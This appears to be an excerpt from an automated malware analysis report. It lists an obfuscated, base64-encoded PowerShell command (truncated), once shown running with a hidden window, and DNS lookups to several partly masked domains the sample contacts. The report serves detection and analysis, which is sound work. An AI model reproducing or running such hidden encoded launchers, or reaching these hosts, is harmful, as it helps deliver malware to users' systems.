Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABFAGEAcABjAGsAYgBqAGoAPQAnAFgAbQBjAGEAdABoAGYAdAAnADsAJABJAGEAbABuAGEAYQBnAHMAbwAgAD0AIAAnADcAMwAzAC...
- DNS ASK as####ogervarun.com
- DNS ASK fr#####censesupply.com
- DNS ASK mu#####alinajafi.com
- DNS ASK ka####freetours.com
- DNS ASK ar##jbd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABFAGEAcABjAGsAYgBqAGoAPQAnAFgAbQBjAGEAdABoAGYAdAAnADsAJABJAGEAbABuAGEAYQBnAHMAbwAgAD0AIAAnADcAMwAzAC...' (with hidden window)